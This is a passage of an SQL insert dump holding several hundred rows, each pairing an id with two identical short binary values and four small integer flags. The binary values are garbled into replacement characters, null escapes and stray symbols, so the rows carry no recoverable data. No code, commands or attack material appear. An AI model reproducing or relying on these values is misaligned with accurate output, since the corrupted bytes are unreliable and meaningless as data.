(3663,'�jp>','�jp>',1,0,90,0),
(3664,'u5-�','u5-�',1,0,90,0),
(3665,'�M?','�M?',1,0,90,0),
(3666,'Ҙ�','Ҙ�',1,0,90,0),
(3667,'[yB�','[yB�',1,0,90,0),
(3668,'k�mG','k�mG',1,0,90,0),
(3669,'��','��',1,0,90,0),
(3670,'��5','��5',1,0,90,0),
(3671,']P',']P',1,0,90,0),
(3672,';�P',';�P',1,0,90,0),
(3673,'%�^','%�^',1,0,90,0),
(3674,'��\n&','��\n&',1,0,90,0),
(3675,'��K�','��K�',1,0,90,0),
(3676,'�߭�','�߭�',1,0,90,0),
(3677,'�~y8','�~y8',1,0,90,0),
(3678,'v�A','v�A',1,0,90,0),
(3679,'�2�A','�2�A',1,0,90,0),
(3680,'�ATw','�ATw',1,0,90,0),
(3681,'�[�','�[�',1,0,90,0),
(3682,'t�!a','t�!a',1,0,90,0),
(3683,'��','��',1,0,90,0),
(3684,' A�\0\0\0\0\0\0\0\0\0',' A�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(3685,'^��','^��',1,0,90,0),
(3686,'���H','���H',1,0,90,0),
(3687,'D��','D��',1,0,90,0),
(3688,' �\0(Uqhp�06uI',' �\0(Uqhp�06uI',1,0,90,1),
(3689,'��^','��^',1,0,90,0),
(3690,'#�v','#�v',1,0,90,0),
(3691,'&�\0�\0\0\0\0\nv�P','&�\0�\0\0\0\0\nv�P',1,0,90,1),
(3692,'�_�h','�_�h',1,0,90,0),
(3693,'g�','g�',1,0,90,0),
(3694,'&\0\0_h2�y��z�p','&\0\0_h2�y��z�p',1,0,90,1),
(3695,'��\n','��\n',1,0,90,0),
(3696,'k���','k���',1,0,90,0),
(3697,'X�','X�',1,0,90,0),
(3698,'�+-�','�+-�',1,0,90,0),
(3699,'C�-�','C�-�',1,0,90,0),
(3700,'>HA','>HA',1,0,90,0),
(3701,'*G�\0�C\0\0\0\0\0\0\0','*G�\0�C\0\0\0\0\0\0\0',1,0,90,1),
(3702,'�$��','�$��',1,0,90,0),
(3703,'\rG1','\rG1',1,0,90,0),
(3704,'p٠�','p٠�',1,0,90,0),
(3705,'\"W{:','\"W{:',1,0,90,0),
(3706,'&�\0/\0\0\0\0��','&�\0/\0\0\0\0��',1,0,90,1),
(3707,'D��v','D��v',1,0,90,0),
(3708,'&��\0�\0\0\0\0�P\0','&��\0�\0\0\0\0�P\0',1,0,90,1),
(3709,'4��y','4��y',1,0,90,0),
(3710,'&�\0�\0\0\0\0>,I','&�\0�\0\0\0\0>,I',1,0,90,1),
(3711,'P�sE','P�sE',1,0,90,0),
(3712,'�^�','�^�',1,0,90,0),
(3713,'4��g','4��g',1,0,90,0),
(3714,'H!f','H!f',1,0,90,0),
(3715,'���','���',1,0,90,0),
(3716,'�','�',1,0,90,0),
(3717,'*G�\0�\0\0\0\0\0\0\0','*G�\0�\0\0\0\0\0\0\0',1,0,90,1),
(3718,'A�\\','A�\\',1,0,90,0),
(3719,'&\0�w\0���Pq��U','&\0�w\0���Pq��U',1,0,90,1),
(3720,' �z',' �z',1,0,90,0),
(3721,'m{�','m{�',1,0,90,0),
(3722,'*� P`\0\0\0\0\0\0\0','*� P`\0\0\0\0\0\0\0',1,0,90,1),
(3723,'R�&�','R�&�',1,0,90,0),
(3724,'�i�','�i�',1,0,90,0),
(3725,'�ќ','�ќ',1,0,90,0),
(3726,'\"J��','\"J��',1,0,90,0),
(3727,'�&Y3','�&Y3',1,0,90,0),
(3728,'��^\n','��^\n',1,0,90,0),
(3729,'>�0E','>�0E',1,0,90,0),
(3730,'��`�','��`�',1,0,90,0),
(3731,'�ar�','�ar�',1,0,90,0),
(3732,'4i�','4i�',1,0,90,0),
(3733,'U��;','U��;',1,0,90,0),
(3734,'*8\n\0\0\0\0\0\0%','*8\n\0\0\0\0\0\0%',1,0,90,1),
(3735,'4��n','4��n',1,0,90,0),
(3736,' A�\0u�\0\0\0\0\0\0\0',' A�\0u�\0\0\0\0\0\0\0',1,0,90,1),
(3737,'T17','T17',1,0,90,0),
(3738,' D�P J;@IU����',' D�P J;@IU����',1,0,90,1),
(3739,'��A�','��A�',1,0,90,0),
(3740,'��','��',1,0,90,0),
(3741,'�[a','�[a',1,0,90,0),
(3742,'*\0�\0\0\0\0\0�Q�\0','*\0�\0\0\0\0\0�Q�\0',1,0,90,1),
(3743,'*x`\0\0\0\0\0�%p\0 \0','*x`\0\0\0\0\0�%p\0 \0',1,0,90,1),
(3744,'��H','��H',1,0,90,0),
(3745,'��܉','��܉',1,0,90,0),
(3746,'�6~','�6~',1,0,90,0),
(3747,'$�\Z>�\0�v^��蠠','$�\Z>�\0�v^��蠠',1,0,90,1),
(3748,'\"�l','\"�l',1,0,90,0),
(3749,'�iw�','�iw�',1,0,90,0),
(3750,'�Ƽ(','�Ƽ(',1,0,90,0),
(3751,'&\0<\0\0\0\0�<���� 4','&\0<\0\0\0\0�<���� 4',1,0,90,1),
(3752,'6AH','6AH',1,0,90,0),
(3753,'�jx�','�jx�',1,0,90,0),
(3754,'D���','D���',1,0,90,0),
(3755,'(\0�\0\0\0\0\0\0\0\0\0','(\0�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(3756,'.%�i','.%�i',1,0,90,0),
(3757,'��,','��,',1,0,90,0),
(3758,'£��','£��',1,0,90,0),
(3759,'On0G','On0G',1,0,90,0),
(3760,'*��e~\0\0\0\0\0\0\0','*��e~\0\0\0\0\0\0\0',1,0,90,1),
(3761,'`�#','`�#',1,0,90,0),
(3762,'�&Xu','�&Xu',1,0,90,0),
(3763,'g�3','g�3',1,0,90,0),
(3764,'bt�k','bt�k',1,0,90,0),
(3765,'$\0a�\0\0�\0\0\0\0 5�','$\0a�\0\0�\0\0\0\0 5�',1,0,90,1),
(3766,'E1p>','E1p>',1,0,90,0),
(3767,'��|c','��|c',1,0,90,0),
(3768,'���','���',1,0,90,0),
(3769,'�nӀ','�nӀ',1,0,90,0),
(3770,'H\0�V','H\0�V',1,0,90,0),
(3771,'rtt{','rtt{',1,0,90,0),
(3772,'�;�','�;�',1,0,90,0),
(3773,'+��','+��',1,0,90,0),
(3774,'&�lj\0\0\0\0\0\0-��','&�lj\0\0\0\0\0\0-��',1,0,90,1),
(3775,'x0p�','x0p�',1,0,90,0),
(3776,'�G�','�G�',1,0,90,0),
(3777,'.\Z�','.\Z�',1,0,90,0),
(3778,'��T;','��T;',1,0,90,0),
(3779,'3�i�','3�i�',1,0,90,0),
(3780,'� �','� �',1,0,90,0),
(3781,'3K=r','3K=r',1,0,90,0),
(3782,'O�_�','O�_�',1,0,90,0),
(3783,'#�qu','#�qu',1,0,90,0),
(3784,'oRJ','oRJ',1,0,90,0),
(3785,'4���','4���',1,0,90,0),
(3786,'�;\Z�','�;\Z�',1,0,90,0),
(3787,'*G�\0�\0\0\0\0\0\0\0','*G�\0�\0\0\0\0\0\0\0',1,0,90,1),
(3788,'@Z0�','@Z0�',1,0,90,0),
(3789,'+�7W','+�7W',1,0,90,0),
(3790,'�m','�m',1,0,90,0),
(3791,' �D\0b%T\0�� �',' �D\0b%T\0�� �',1,0,90,1),
(3792,'��Q','��Q',1,0,90,0),
(3793,'2>�','2>�',1,0,90,0),
(3794,'&�\0�D\0\0\0\0��\r','&�\0�D\0\0\0\0��\r',1,0,90,1),
(3795,'ed�S','ed�S',1,0,90,0),
(3796,'t�z�','t�z�',1,0,90,0),
(3797,'Amj�','Amj�',1,0,90,0),
(3798,'-|T�','-|T�',1,0,90,0),
(3799,'g/��','g/��',1,0,90,0),
(3800,'�ǚ=','�ǚ=',1,0,90,0),
(3801,'��Qv','��Qv',1,0,90,0),
(3802,'�Ʃ8','�Ʃ8',1,0,90,0),
(3803,'*G�\0�\0\0\0\0\0\0\0','*G�\0�\0\0\0\0\0\0\0',1,0,90,1),
(3804,'D��R','D��R',1,0,90,0),
(3805,'R�7)','R�7)',1,0,90,0),
(3806,'��3','��3',1,0,90,0),
(3807,'�kp�','�kp�',1,0,90,0),
(3808,'+�\'','+�\'',1,0,90,0),
(3809,'>H}','>H}',1,0,90,0),
(3810,'RA�)','RA�)',1,0,90,0),
(3811,'3O�','3O�',1,0,90,0),
(3812,'��\n�','��\n�',1,0,90,0),
(3813,'_�n!','_�n!',1,0,90,0),
(3814,'\"���','\"���',1,0,90,0),
(3815,'$[[0','$[[0',1,0,90,0),
(3816,')��',')��',1,0,90,0),
(3817,'�/]','�/]',1,0,90,0),
(3818,'2�|\n','2�|\n',1,0,90,0),
(3819,'�/C','�/C',1,0,90,0),
(3820,'QD{�','QD{�',1,0,90,0),
(3821,'��','��',1,0,90,0),
(3822,'%x�[','%x�[',1,0,90,0),
(3823,' \r�x\0\0\0\0\0\0\0\0\0>',' \r�x\0\0\0\0\0\0\0\0\0>',1,0,90,1),
(3824,'>��','>��',1,0,90,0),
(3825,'˾�','˾�',1,0,90,0),
(3826,' A�:\0\0\0\0\0\0\0\0',' A�:\0\0\0\0\0\0\0\0',1,0,90,1),
(3827,'�DzI','�DzI',1,0,90,0),
(3828,' �\r\0\0\0\0\0\0\0',' �\r\0\0\0\0\0\0\0',1,0,90,1),
(3829,'�mJ;','�mJ;',1,0,90,0),
(3830,' �\0iV�5����',' �\0iV�5����',1,0,90,1),
(3831,'�;','�;',1,0,90,0),
(3832,'^�l ','^�l ',1,0,90,0),
(3833,'E1p<','E1p<',1,0,90,0),
(3834,'���a','���a',1,0,90,0),
(3835,'��k','��k',1,0,90,0),
(3836,'��݅','��݅',1,0,90,0),
(3837,'�CN�','�CN�',1,0,90,0),
(3838,'B�8v','B�8v',1,0,90,0),
(3839,'�;�','�;�',1,0,90,0),
(3840,'��k','��k',1,0,90,0),
(3841,' ��',' ��',1,0,90,0),
(3842,'+�b�','+�b�',1,0,90,0),
(3843,'� Q�','� Q�',1,0,90,0),
(3844,'4$�d','4$�d',1,0,90,0),
(3845,'��zU','��zU',1,0,90,0),
(3846,'��g','��g',1,0,90,0),
(3847,'h�ލ','h�ލ',1,0,90,0),
(3848,'gj��','gj��',1,0,90,0),
(3849,'\"��h','\"��h',1,0,90,0),
(3850,'N/F','N/F',1,0,90,0),
(3851,'DAz�','DAz�',1,0,90,0),
(3852,'2>ܘ','2>ܘ',1,0,90,0),
(3853,'\"H1','\"H1',1,0,90,0),
(3854,'�m�','�m�',1,0,90,0),
(3855,'\\��B','\\��B',1,0,90,0),
(3856,'�B�','�B�',1,0,90,0),
(3857,'�G�8','�G�8',1,0,90,0),
(3858,'D���','D���',1,0,90,0),
(3859,'��r*','��r*',1,0,90,0),
(3860,'*.���\0\0\0\0h\0','*.���\0\0\0\0h\0',1,0,90,1),
(3861,'B�)','B�)',1,0,90,0),
(3862,'�ܯ ','�ܯ ',1,0,90,0),
(3863,'P�$','P�$',1,0,90,0),
(3864,'4�b�','4�b�',1,0,90,0),
(3865,'*\n^�\0\0\0\0\0/��\0','*\n^�\0\0\0\0\0/��\0',1,0,90,1),
(3866,'�ɾ','�ɾ',1,0,90,0),
(3867,'�B� ','�B� ',1,0,90,0),
(3868,'}?d�','}?d�',1,0,90,0),
(3869,'�\Z�','�\Z�',1,0,90,0),
(3870,'��P�','��P�',1,0,90,0),
(3871,'�G�D','�G�D',1,0,90,0),
(3872,'\\�G','\\�G',1,0,90,0),
(3873,'��y','��y',1,0,90,0),
(3874,'h�K�','h�K�',1,0,90,0),
(3875,'���','���',1,0,90,0),
(3876,'g�qR','g�qR',1,0,90,0),
(3877,'��f&','��f&',1,0,90,0),
(3878,'E?@','E?@',1,0,90,0),
(3879,'2>��','2>��',1,0,90,0),
(3880,'�6r=','�6r=',1,0,90,0),
(3881,'��~s','��~s',1,0,90,0),
(3882,'�mp','�mp',1,0,90,0),
(3883,'4�b�','4�b�',1,0,90,0),
(3884,'$\0a�\0\0�\0\0\0\0��','$\0a�\0\0�\0\0\0\0��',1,0,90,1),
(3885,'*��\rw\0\0\0\0\0\0\0','*��\rw\0\0\0\0\0\0\0',1,0,90,1),
(3886,'��','��',1,0,90,0),
(3887,'��G','��G',1,0,90,0),
(3888,'D��','D��',1,0,90,0),
(3889,'D��N','D��N',1,0,90,0),
(3890,'xm�','xm�',1,0,90,0),
(3891,'D��.','D��.',1,0,90,0),
(3892,'����','����',1,0,90,0),
(3893,'s��','s��',1,0,90,0),
(3894,'H�O�','H�O�',1,0,90,0),
(3895,'\'j��','\'j��',1,0,90,0),
(3896,'g1��','g1��',1,0,90,0),
(3897,'n*��','n*��',1,0,90,0),
(3898,'�G�','�G�',1,0,90,0),
(3899,'�� �','�� �',1,0,90,0),
(3900,'��','��',1,0,90,0),
(3901,'��]�','��]�',1,0,90,0),
(3902,'2>��','2>��',1,0,90,0),
(3903,'\"��p','\"��p',1,0,90,0),
(3904,'g��X','g��X',1,0,90,0),
(3905,'h�=�','h�=�',1,0,90,0),
(3906,'�6r','�6r',1,0,90,0),
(3907,'-v�+','-v�+',1,0,90,0),
(3908,'�Y,�','�Y,�',1,0,90,0),
(3909,'&�\0z\0\0\0\0^','&�\0z\0\0\0\0^',1,0,90,1),
(3910,'&�\0/\0\0\0\0�S4','&�\0/\0\0\0\0�S4',1,0,90,1),
(3911,'��PQ','��PQ',1,0,90,0),
(3912,'��)','��)',1,0,90,0),
(3913,'�','�',1,0,90,0),
(3914,'&�\0�\0\0\0\0�','&�\0�\0\0\0\0�',1,0,90,1),
(3915,'�+��','�+��',1,0,90,0),
(3916,'�q�B','�q�B',1,0,90,0),
(3917,'��\nq','��\nq',1,0,90,0),
(3918,'?�&�','?�&�',1,0,90,0),
(3919,'��s','��s',1,0,90,0),
(3920,'����','����',1,0,90,0),
(3921,'M','M',1,0,90,0),
(3922,'h���','h���',1,0,90,0),
(3923,'B�','B�',1,0,90,0),
(3924,'&�\0�\0\0\0\0�[','&�\0�\0\0\0\0�[',1,0,90,1),
(3925,'&U0\0+\0\0\0\0\0\0\0','&U0\0+\0\0\0\0\0\0\0',1,0,90,1),
(3926,'1�J�','1�J�',1,0,90,0),
(3927,'g���','g���',1,0,90,0),
(3928,'�ѷN','�ѷN',1,0,90,0),
(3929,'X��','X��',1,0,90,0),
(3930,'1$A�','1$A�',1,0,90,0),
(3931,'��','��',1,0,90,0),
(3932,'6���','6���',1,0,90,0),
(3933,'�Y3','�Y3',1,0,90,0),
(3934,'���','���',1,0,90,0),
(3935,'B�8^','B�8^',1,0,90,0),
(3936,'�','�',1,0,90,0),
(3937,'6Aa�','6Aa�',1,0,90,0),
(3938,'�\0�','�\0�',1,0,90,0),
(3939,'���','���',1,0,90,0),
(3940,'�ˢ','�ˢ',1,0,90,0),
(3941,'��\n�','��\n�',1,0,90,0),
(3942,'���','���',1,0,90,0),
(3943,'\"�l�','\"�l�',1,0,90,0),
(3944,'D�#|','D�#|',1,0,90,0),
(3945,'��P6','��P6',1,0,90,0),
(3946,'4��l','4��l',1,0,90,0),
(3947,'��q�','��q�',1,0,90,0),
(3948,'h�0C','h�0C',1,0,90,0),
(3949,'&\0\0_h2r9�l$]#�','&\0\0_h2r9�l$]#�',1,0,90,1),
(3950,'�E�','�E�',1,0,90,0),
(3951,'���','���',1,0,90,0),
(3952,'\rY�','\rY�',1,0,90,0),
(3953,'\rY�','\rY�',1,0,90,0),
(3954,'_�\r','_�\r',1,0,90,0),
(3955,'\rY?','\rY?',1,0,90,0),
(3956,'��k','��k',1,0,90,0),
(3957,'/l_-','/l_-',1,0,90,0),
(3958,'(V�','(V�',1,0,90,0),
(3959,'\rY�','\rY�',1,0,90,0),
(3960,'\rY>�','\rY>�',1,0,90,0),
(3961,'�;+�','�;+�',1,0,90,0),
(3962,'��S�','��S�',1,0,90,0),
(3963,'Wyݛ','Wyݛ',1,0,90,0),
(3964,'l��;','l��;',1,0,90,0),
(3965,'�!R','�!R',1,0,90,0),
(3966,'2tpn','2tpn',1,0,90,0),
(3967,'��R�','��R�',1,0,90,0),
(3968,'l��','l��',1,0,90,0),
(3969,'��{>','��{>',1,0,90,0),
(3970,'�{�','�{�',1,0,90,0),
(3971,'-W�N','-W�N',1,0,90,0),
(3972,'��Y�','��Y�',1,0,90,0),
(3973,'l��Y','l��Y',1,0,90,0),
(3974,'��n','��n',1,0,90,0),
(3975,'@Z\"j','@Z\"j',1,0,90,0),
(3976,'��-','��-',1,0,90,0),
(3977,'���','���',1,0,90,0),
(3978,'�9��','�9��',1,0,90,0),
(3979,'3D�','3D�',1,0,90,0),
(3980,'-��2','-��2',1,0,90,0),
(3981,'�Z�v','�Z�v',1,0,90,0),
(3982,'(z��','(z��',1,0,90,0),
(3983,'���','���',1,0,90,0),
(3984,'�\'�l','�\'�l',1,0,90,0),
(3985,'z\'j','z\'j',1,0,90,0),
(3986,'ج�-','ج�-',1,0,90,0),
(3987,'_�@','_�@',1,0,90,0),
(3988,'��R�','��R�',1,0,90,0),
(3989,'��','��',1,0,90,0),
(3990,',�',',�',1,0,90,0),
(3991,',I',',I',1,0,90,0),
(3992,'��|�','��|�',1,0,90,0),
(3993,'��<�','��<�',1,0,90,0),
(3994,'�5(�','�5(�',1,0,90,0),
(3995,'�&G','�&G',1,0,90,0),
(3996,'�ݠ','�ݠ',1,0,90,0),
(3997,'+��','+��',1,0,90,0),
(3998,'e��','e��',1,0,90,0),
(3999,'[�F�','[�F�',1,0,90,0),
(4000,'�bQl','�bQl',1,0,90,0),
(4001,'��ʹ','��ʹ',1,0,90,0),
(4002,'gK-z','gK-z',1,0,90,0),
(4003,'l��','l��',1,0,90,0),
(4004,'l��@','l��@',1,0,90,0),
(4005,'�i','�i',1,0,90,0),
(4006,'l���','l���',1,0,90,0),
(4007,'C�c�','C�c�',1,0,90,0),
(4008,' A�0\0\0\0\0\0\0\0N',' A�0\0\0\0\0\0\0\0N',1,0,90,1),
(4009,'-��','-��',1,0,90,0),
(4010,'{','{',1,0,90,0),
(4011,'��F','��F',1,0,90,0),
(4012,'3SO','3SO',1,0,90,0),
(4013,'��a','��a',1,0,90,0),
(4014,'n��','n��',1,0,90,0),
(4015,'����','����',1,0,90,0),
(4016,'^��','^��',1,0,90,0),
(4017,'q�4','q�4',1,0,90,0),
(4018,'�є','�є',1,0,90,0),
(4019,'R�-1','R�-1',1,0,90,0),
(4020,'\"C�','\"C�',1,0,90,0),
(4021,'q��E','q��E',1,0,90,0),
(4022,'�@�','�@�',1,0,90,0),
(4023,'*G�\0\0\0\0\0\0\0\0\0\0@','*G�\0\0\0\0\0\0\0\0\0\0@',1,0,90,1),
(4024,'�#�','�#�',1,0,90,0),
(4025,'�]%�','�]%�',1,0,90,0),
(4026,'á)F','á)F',1,0,90,0),
(4027,'%0M�','%0M�',1,0,90,0),
(4028,'3�[\'','3�[\'',1,0,90,0),
(4029,'���','���',1,0,90,0),
(4030,'&\0�B\0%��;(<','&\0�B\0%��;(<',1,0,90,1),
(4031,'N.\n�','N.\n�',1,0,90,0),
(4032,'\"I΅','\"I΅',1,0,90,0),
(4033,'��*','��*',1,0,90,0),
(4034,'�8d','�8d',1,0,90,0),
(4035,'��/','��/',1,0,90,0),
(4036,'��]','��]',1,0,90,0),
(4037,'�@��','�@��',1,0,90,0),
(4038,'4�b�','4�b�',1,0,90,0),
(4039,'�J�','�J�',1,0,90,0),
(4040,'g9ݴ','g9ݴ',1,0,90,0),
(4041,'��Ng','��Ng',1,0,90,0),
(4042,'4�_z','4�_z',1,0,90,0),
(4043,'g��p','g��p',1,0,90,0),
(4044,'gK��','gK��',1,0,90,0),
(4045,'R^��','R^��',1,0,90,0),
(4046,';@,',';@,',1,0,90,0),
(4047,'$��C\0\r�jْv<','$��C\0\r�jْv<',1,0,90,1),
(4048,'�_+','�_+',1,0,90,0),
(4049,'�\rgS','�\rgS',1,0,90,0),
(4050,'�F-�','�F-�',1,0,90,0),
(4051,'�\0x','�\0x',1,0,90,0),
(4052,'Bv�&','Bv�&',1,0,90,0),
(4053,'�� �','�� �',1,0,90,0),
(4054,'C͢�','C͢�',1,0,90,0),
(4055,'��I�','��I�',1,0,90,0),
(4056,'S��9','S��9',1,0,90,0),
(4057,'����','����',1,0,90,0),
(4058,'�q�C','�q�C',1,0,90,0),
(4059,'}�\n�','}�\n�',1,0,90,0),
(4060,'h���','h���',1,0,90,0),
(4061,'�j`�','�j`�',1,0,90,0),
(4062,'£!�','£!�',1,0,90,0),
(4063,'��@�','��@�',1,0,90,0),
(4064,',�s�',',�s�',1,0,90,0),
(4065,'6��4','6��4',1,0,90,0),
(4066,'�i','�i',1,0,90,0),
(4067,'��a','��a',1,0,90,0),
(4068,'��FE','��FE',1,0,90,0),
(4069,'��','��',1,0,90,0),
(4070,'\"Iw3','\"Iw3',1,0,90,0),
(4071,'�q�','�q�',1,0,90,0),
(4072,'�9�','�9�',1,0,90,0),
(4073,'�?\"','�?\"',1,0,90,0),
(4074,'��A','��A',1,0,90,0),
(4075,'�,M3','�,M3',1,0,90,0),
(4076,'*�y�\0\0\0\0\0\0\0W','*�y�\0\0\0\0\0\0\0W',1,0,90,1),
(4077,'�ӂ','�ӂ',1,0,90,0),
(4078,'6%','6%',1,0,90,0),
(4079,'��>','��>',1,0,90,0),
(4080,'*G�\0\0\0\0\0\0\0\0\0\0,','*G�\0\0\0\0\0\0\0\0\0\0,',1,0,90,1),
(4081,'*G�\0\0\0\0\0\0\0\0\0\06','*G�\0\0\0\0\0\0\0\0\0\06',1,0,90,1),
(4082,'/�R','/�R',1,0,90,0),
(4083,'K�\\>','K�\\>',1,0,90,0),
(4084,'6�ܣ','6�ܣ',1,0,90,0),
(4085,'PO�','PO�',1,0,90,0),
(4086,'��:','��:',1,0,90,0),
(4087,'���5','���5',1,0,90,0),
(4088,'ó��','ó��',1,0,90,0),
(4089,'��','��',1,0,90,0),
(4090,'-��0','-��0',1,0,90,0),
(4091,'+�U�','+�U�',1,0,90,0),
(4092,'b#E�','b#E�',1,0,90,0),
(4093,'�=�','�=�',1,0,90,0),
(4094,'�z�,','�z�,',1,0,90,0),
(4095,'h�zW','h�zW',1,0,90,0),
(4096,'E1pC','E1pC',1,0,90,0),
(4097,'�#6c','�#6c',1,0,90,0),
(4098,'\r�Β','\r�Β',1,0,90,0),
(4099,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4100,'�o','�o',1,0,90,0),
(4101,'6�-�','6�-�',1,0,90,0),
(4102,'R���','R���',1,0,90,0),
(4103,'�\\','�\\',1,0,90,0),
(4104,'�4�','�4�',1,0,90,0),
(4105,'^�0�','^�0�',1,0,90,0),
(4106,'- \0','- \0',1,0,90,0),
(4107,'�)�^','�)�^',1,0,90,0),
(4108,'�˥#','�˥#',1,0,90,0),
(4109,'�ZP�','�ZP�',1,0,90,0),
(4110,'���','���',1,0,90,0),
(4111,'p|\'�','p|\'�',1,0,90,0),
(4112,'�(Wj','�(Wj',1,0,90,0),
(4113,'�/X','�/X',1,0,90,0),
(4114,'��-','��-',1,0,90,0),
(4115,'�JF','�JF',1,0,90,0),
(4116,'���i','���i',1,0,90,0),
(4117,'��r','��r',1,0,90,0),
(4118,'�;','�;',1,0,90,0),
(4119,'6T��','6T��',1,0,90,0),
(4120,'#�ym','#�ym',1,0,90,0),
(4121,'��3','��3',1,0,90,0),
(4122,'��V','��V',1,0,90,0),
(4123,'X\\','X\\',1,0,90,0),
(4124,'Yȫ�','Yȫ�',1,0,90,0),
(4125,'N/)]','N/)]',1,0,90,0),
(4126,'�Zk','�Zk',1,0,90,0),
(4127,'���','���',1,0,90,0),
(4128,' A�-\0\0\0\0\0\0\0\0',' A�-\0\0\0\0\0\0\0\0',1,0,90,1),
(4129,'����','����',1,0,90,0),
(4130,'��','��',1,0,90,0),
(4131,'*G�\0\0\0\0\0\0\0\0\0\05','*G�\0\0\0\0\0\0\0\0\0\05',1,0,90,1),
(4132,'*G�\0\0\0\0\0\0\0\0\0\0J','*G�\0\0\0\0\0\0\0\0\0\0J',1,0,90,1),
(4133,'*G�\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4134,'�z%','�z%',1,0,90,0),
(4135,'�W','�W',1,0,90,0),
(4136,'\"v\0:','\"v\0:',1,0,90,0),
(4137,'�ˆ�','�ˆ�',1,0,90,0),
(4138,'�','�',1,0,90,0),
(4139,'��ή','��ή',1,0,90,0),
(4140,'\\���','\\���',1,0,90,0),
(4141,'w�_','w�_',1,0,90,0),
(4142,'�� �','�� �',1,0,90,0),
(4143,'Q��','Q��',1,0,90,0),
(4144,'�CI;','�CI;',1,0,90,0),
(4145,'��d�','��d�',1,0,90,0),
(4146,'1$G^','1$G^',1,0,90,0),
(4147,'����','����',1,0,90,0),
(4148,'��,E','��,E',1,0,90,0),
(4149,'���-','���-',1,0,90,0),
(4150,'ޔ�','ޔ�',1,0,90,0),
(4151,'*G�\0\0\0\0\0\0\0\0\0\0E','*G�\0\0\0\0\0\0\0\0\0\0E',1,0,90,1),
(4152,'*G�\0.�\0\0\0\0\0\0\0','*G�\0.�\0\0\0\0\0\0\0',1,0,90,1),
(4153,'�@sG','�@sG',1,0,90,0),
(4154,'�=�','�=�',1,0,90,0),
(4155,'h��w','h��w',1,0,90,0),
(4156,'*G�\0\0\0\0\0\0\0\0\0\0B','*G�\0\0\0\0\0\0\0\0\0\0B',1,0,90,1),
(4157,'R���','R���',1,0,90,0),
(4158,'k�y','k�y',1,0,90,0),
(4159,'D���','D���',1,0,90,0),
(4160,'Y�kC','Y�kC',1,0,90,0),
(4161,'3[�','3[�',1,0,90,0),
(4162,'M �','M �',1,0,90,0),
(4163,'��a','��a',1,0,90,0),
(4164,'��:','��:',1,0,90,0),
(4165,'��8�','��8�',1,0,90,0),
(4166,'£�D','£�D',1,0,90,0),
(4167,'��1>','��1>',1,0,90,0),
(4168,'O�H�','O�H�',1,0,90,0),
(4169,'*G�\0\0\0\0\0\0\0\0\0\0?','*G�\0\0\0\0\0\0\0\0\0\0?',1,0,90,1),
(4170,'�w�','�w�',1,0,90,0),
(4171,'�.Q+','�.Q+',1,0,90,0),
(4172,'���T','���T',1,0,90,0),
(4173,'*��w\0\0\0\0\0\0\0','*��w\0\0\0\0\0\0\0',1,0,90,1),
(4174,'�m�','�m�',1,0,90,0),
(4175,'*��JM\0\0\0\0\0\0\0','*��JM\0\0\0\0\0\0\0',1,0,90,1),
(4176,'��Gj','��Gj',1,0,90,0),
(4177,'g0��','g0��',1,0,90,0),
(4178,'6�f�','6�f�',1,0,90,0),
(4179,'#��g','#��g',1,0,90,0),
(4180,'>��4','>��4',1,0,90,0),
(4181,'.Ƽ','.Ƽ',1,0,90,0),
(4182,'*�0Q9 \0\0\0\0\0\0\0','*�0Q9 \0\0\0\0\0\0\0',1,0,90,1),
(4183,'[�T�','[�T�',1,0,90,0),
(4184,'oDa&','oDa&',1,0,90,0),
(4185,'Yu�','Yu�',1,0,90,0),
(4186,'v���','v���',1,0,90,0),
(4187,'BUJ\n','BUJ\n',1,0,90,0),
(4188,' A�v\0\0\0\0\0\0\0\0',' A�v\0\0\0\0\0\0\0\0',1,0,90,1),
(4189,'��q�','��q�',1,0,90,0),
(4190,'Wx P','Wx P',1,0,90,0),
(4191,'�M�','�M�',1,0,90,0),
(4192,'�jm�','�jm�',1,0,90,0),
(4193,'\"�^�','\"�^�',1,0,90,0),
(4194,'Ѷ��','Ѷ��',1,0,90,0),
(4195,'�','�',1,0,90,0),
(4196,'*G�\0\0\0\0\0\0\0\0\0\0\"','*G�\0\0\0\0\0\0\0\0\0\0\"',1,0,90,1),
(4197,'*�;>�\0\0\0\0\0\0\0X','*�;>�\0\0\0\0\0\0\0X',1,0,90,1),
(4198,' A��\0\0\0\0\0\0\0\0',' A��\0\0\0\0\0\0\0\0',1,0,90,1),
(4199,'*G�\0\0\0\0\0\0\0\0\0\0.','*G�\0\0\0\0\0\0\0\0\0\0.',1,0,90,1),
(4200,'%�\r=','%�\r=',1,0,90,0),
(4201,'�g�','�g�',1,0,90,0),
(4202,'*G�\0\0\0\0\0\0\0\0\0\0','*G�\0\0\0\0\0\0\0\0\0\0',1,0,90,1),
(4203,'*G�\0\0\0\0\0\0\0\0\0\0\n','*G�\0\0\0\0\0\0\0\0\0\0\n',1,0,90,1),
(4204,'���d','���d',1,0,90,0),
(4205,' A�!\0\0\0\0\0\0\0',' A�!\0\0\0\0\0\0\0',1,0,90,1),
(4206,'*G�\0(h\0\0\0\0\0\0\0','*G�\0(h\0\0\0\0\0\0\0',1,0,90,1),
(4207,'*�a9S\0\0\0\0\0\0\0','*�a9S\0\0\0\0\0\0\0',1,0,90,1),
(4208,'*��\0\0�\0\0\0\0P�','*��\0\0�\0\0\0\0P�',1,0,90,1),
(4209,')�D',')�D',1,0,90,0),
(4210,'-�,','-�,',1,0,90,0),
(4211,'*��\0\0�\0\0\0\0�0','*��\0\0�\0\0\0\0�0',1,0,90,1),
(4212,'\\�k@','\\�k@',1,0,90,0),
(4213,'.�)�','.�)�',1,0,90,0),
(4214,'��\"B','��\"B',1,0,90,0),
(4215,'���j','���j',1,0,90,0),
(4216,'�P5','�P5',1,0,90,0),
(4217,'N/S�','N/S�',1,0,90,0),
(4218,'U���','U���',1,0,90,0),
(4219,'DF�','DF�',1,0,90,0),
(4220,'�AV�','�AV�',1,0,90,0),
(4221,' � \0\0N�\0\0\0\0)',' � \0\0N�\0\0\0\0)',1,0,90,1),
(4222,'^�','^�',1,0,90,0),
(4223,'�;�&','�;�&',1,0,90,0),
(4224,'�[F','�[F',1,0,90,0),
(4225,'�W�','�W�',1,0,90,0),
(4226,'%���','%���',1,0,90,0),
(4227,'Q�%�','Q�%�',1,0,90,0),
(4228,'��','��',1,0,90,0),
(4229,'�Lu','�Lu',1,0,90,0),
(4230,'���','���',1,0,90,0),
